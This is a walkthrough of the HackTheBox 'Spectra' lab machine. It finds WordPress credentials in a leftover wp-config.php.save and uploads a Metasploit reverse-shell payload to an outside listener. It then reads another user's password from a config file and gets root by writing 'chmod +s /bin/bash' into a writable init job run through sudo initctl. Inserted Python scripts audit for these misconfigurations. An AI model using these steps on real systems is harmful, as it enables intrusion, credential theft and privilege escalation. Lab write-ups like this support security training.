Spectra HackTheBox WalkThrough
This is the Spectra HackTheBox machine walkthrough. In this writeup I have demonstrated step by step how I rooted the Spectra HTB machine. Before starting, let us know something about this machine. It is a Linux OS box (which I came to know after rooting) with IP address 10.10.10.229 and difficulty easy assigned by its maker.
Also, connect your PC to the HackTheBox VPN and make sure of your connectivity with the Spectra machine by pinging its IP 10.10.10.229. If all goes correctly then start hacking. As usual, I started by scanning the machine. I used Nmap (port scanner) for this task and the result is below:
$ sudo nmap -sT -sV -p- -O -oA nmap/all-tcp-ports 10.10.10.229
The full TCP scan with Nmap found three open ports: an OpenSSH server, an Nginx web server on port 80, and a MySQL database server on port 3306.
OpenSSH 8.1 is not affected by any serious vulnerability, so I left it for enumeration later, when I would have some credentials. Since a web server is running on port 80 there should be some website hosted on it, and it can be accessed at the URL http://10.10.10.229.
After going to this URL I found a simple HTML web page with some links, namely Software Issue Tracker and Test. Both these links revealed a virtual host, spectra.htb. So before accessing them let us add spectra.htb to our hosts file, which is /etc/hosts.
Host File After Modification
$ cat /etc/hosts
After going to the URL http://spectra.htb/main/ I found that WordPress is installed in the /main folder with its default theme. Then I pressed CTRL+U to check the source code of this page, and from the source code I found the WordPress version. A quick Google search revealed that this version is not affected by any serious vulnerability that would help us in further enumeration. After going to the URL http://spectra.htb/testing/index.php I found another instance of WordPress installed there, with some database connectivity issue due to which it is not showing the home page. But directory listing is enabled, so you can check all its files through the URL http://spectra.htb/testing.
After some initial enumeration I got the file wp-config.php.save. It contains some credentials. You can only see its content when you view its page source. Here is the URL of the page: http://spectra.htb/testing/wp-config.php.save
From the above, the extracted credential is devtest / devteam01.
When I tried to log in at http://spectra.htb/main/wp-login.php with the credentials devtest / devteam01 it said wrong credentials. But when I tried the credentials administrator / devteam01, it logged in successfully. I think this is the reason the database connectivity issue is present at http://spectra.htb/testing/: devtest should be replaced with administrator in the above config file for proper connectivity. Anyway, let us get a user shell using these creds.
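As an added example (not part of the original walkthrough), here is a small Python audit a site owner could run over a WordPress document root to catch exactly the kind of leftover file that leaked the credentials here: a wp-config.php.save copy that still defines DB_PASSWORD. The suffix list and the constructed sample tree are assumptions.

```python
import os
import re
import tempfile

# Suffixes editors and admins commonly leave behind (assumed list).
BACKUP_SUFFIXES = (".save", ".bak", ".orig", ".old", "~")
# Matches define('DB_PASSWORD', '...') as written in wp-config.php.
DB_PASSWORD_DEFINE = re.compile(
    r"define\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"][^'\"]*['\"]\s*\)")


def find_leftover_configs(docroot):
    """Sorted (relative path, still_defines_password) for every backup copy of
    wp-config.php under docroot. The live wp-config.php is skipped because
    PHP executes it, so its source is not served to browsers."""
    found = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if name == "wp-config.php" or not name.startswith("wp-config.php"):
                continue
            if not name.endswith(BACKUP_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                leaks = DB_PASSWORD_DEFINE.search(fh.read()) is not None
            found.append((os.path.relpath(path, docroot), leaks))
    return sorted(found)


def make_demo_docroot():
    """Constructed document root mirroring the box layout (/main, /testing):
    a live config, a .save copy with a placeholder password, a .bak copy
    with the password line removed."""
    root = tempfile.mkdtemp(prefix="docroot-demo-")
    full = ("<?php\ndefine('DB_USER', 'devtest');\n"
            "define('DB_PASSWORD', 'PLACEHOLDER_NOT_REAL');\n")
    stripped = "<?php\ndefine('DB_USER', 'devtest');\n"
    layout = {
        "testing/wp-config.php": full,        # live file, skipped by the scan
        "testing/wp-config.php.save": full,   # the Spectra leak pattern
        "main/wp-config.php.bak": stripped,   # backup with the password removed
    }
    for rel, body in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, leaks in find_leftover_configs(make_demo_docroot()):
        print(f"{rel}: {'DB_PASSWORD still defined' if leaks else 'no password'}")
```

Any hit is a file to delete; the web server should additionally refuse to serve these names, and directory listing should be off so that a stray copy is not advertised.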
There are multiple ways to get a user shell once you have WordPress login credentials:
1. Upload a shell through the Add Theme option.
2. Upload a shell through the Add Plugins option.
3. Upload a shell into the 404.php file of the theme.
4. Use the header.php of a pre-installed plugin.
5. Use the Metasploit module exploit/unix/webapp/wp_admin_shell_upload to upload a shell and get a session.
I am going to use the 5th way, that is, Metasploit. To get a user shell follow the given steps.
Getting User Shell
msf6 > search wp_admin
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS spectra.htb
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.57
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
meterpreter > sysinfo
meterpreter > getuid
We have successfully got a user shell with the privileges of user nginx. Let us upgrade it to a fully qualified Linux shell so that we can run more advanced Linux commands through it.
meterpreter > shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
We have successfully upgraded the shell. When I tried to capture the user flag from /home/katie/ it gave me permission denied, because user nginx doesn’t have permission to access the user.txt file. We have to find the credentials of user katie, with which we can upgrade this shell to katie’s privileges.
After some enumeration I found the file autologin.conf.orig in the /opt/ directory. This file contains the path of a passwd file which holds the actual credential. The complete path is /etc/autologin/passwd.
$ cat /opt/autologin.conf.orig
$ cat /etc/autologin/passwd
The passwd file holds a credential. When I tried it as the SSH password for katie it worked, so we have the SSH credentials of user katie.
Let us log in to katie’s account and capture the user flag.
Login Into Katie’s Account
$ ssh katie@10.10.10.229
$ whoami && id
We have successfully logged in as katie. Let us capture the user flag.
Capture User Flag
$ cat user.txt
To escalate privileges to root we first have to find a privilege escalation vector.
Finding PrivEsc Vector
The $ sudo -l command revealed that user katie can run the initctl command with root privileges.
This can be our potential PrivEsc vector. When I tried to get a root shell by exploiting this excess right given to user katie, I could get one easily. So here our privilege escalation vector is sudo right exploitation.
Let us understand how it works. initctl is a tool used to start and stop an init daemon (service); we can say it controls all the init daemons running in the system. Check this link for more info. The configuration files of all init daemons are present inside the directory /etc/init/. If we can somehow change any of these configuration files, then we can start its init daemon using the initctl command, which executes that config file. Since the initctl command runs with root privileges, our code inside the configuration file is also executed as root and we get a root shell.
So to get a root shell I modified the init daemon configuration file test.conf inside the directory /etc/init/, since other users can read and write this file. I replaced the content between script and end script with my shell code:
script
chmod +s /bin/bash
end script
After making the changes, save the file and start the daemon using the sudo command as given below, following the steps listed. Do this as soon as possible, because the content of the modified file will be replaced with the previous file content. If all goes correctly you will definitely upgrade your shell to a root shell.
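As an added example (not part of the original walkthrough), a Python audit covering the two conditions that made this escalation possible: Upstart job files under /etc/init that non-root users can write, and sudo rules that let a user run initctl. The sudoers excerpt and the demo directory are constructed, and the sudoers regex handles only the simple one-line rule form.

```python
import os
import re
import stat
import tempfile

# Constructed sudoers excerpt in the shape `sudo -l` reported on the box.
SAMPLE_SUDOERS = """\
# constructed sample, not the real /etc/sudoers
root  ALL=(ALL) ALL
katie ALL=(ALL) NOPASSWD: /sbin/initctl
"""
# user host=(runas) [NOPASSWD:] commands; one-line rules only (assumption).
SUDO_RULE = re.compile(r"^(\S+)\s+\S+=\([^)]*\)\s*(?:NOPASSWD:)?\s*(.+)$")


def initctl_sudo_rules(sudoers_text):
    """(user, command) for every rule whose command list names initctl;
    such a user can start any job, and Upstart runs jobs as root by default."""
    hits = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SUDO_RULE.match(line)
        if m and "initctl" in m.group(2):
            hits.append((m.group(1), m.group(2).strip()))
    return hits


def writable_init_jobs(init_dir):
    """Sorted names of *.conf job files carrying group- or world-write bits.
    Together with the sudo rule above, editing one of these means root."""
    risky = []
    for name in os.listdir(init_dir):
        path = os.path.join(init_dir, name)
        if not (name.endswith(".conf") and os.path.isfile(path)):
            continue
        if os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append(name)
    return sorted(risky)


def make_demo_init_dir():
    """Constructed /etc/init look-alike: one correctly protected job and a
    world-writable test.conf like the one abused in the walkthrough."""
    d = tempfile.mkdtemp(prefix="init-demo-")
    for name, mode in (("cron.conf", 0o644), ("test.conf", 0o666)):
        path = os.path.join(d, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("script\necho demo job\nend script\n")
        os.chmod(path, mode)
    return d
```

On a real host, run writable_init_jobs("/etc/init") and feed the output of `sudo -l` or the sudoers file to initctl_sudo_rules: either finding alone is a misconfiguration, and both together reproduce this box.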
Getting Root Shell
$ sudo -l
$ ls -la /etc/init | grep test
$ vi /etc/init/test.conf
$ cat /etc/init/test.conf
$ sudo /sbin/initctl start test
$ /bin/bash -p
# whoami && id
We are root now. Let us capture the root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted the Spectra HackTheBox machine. I learnt a lot from this challenge; hope you have also learnt some new things. Thanks for reading this walkthrough. For any query or suggestion related to the walkthrough feel free to write us at [email protected].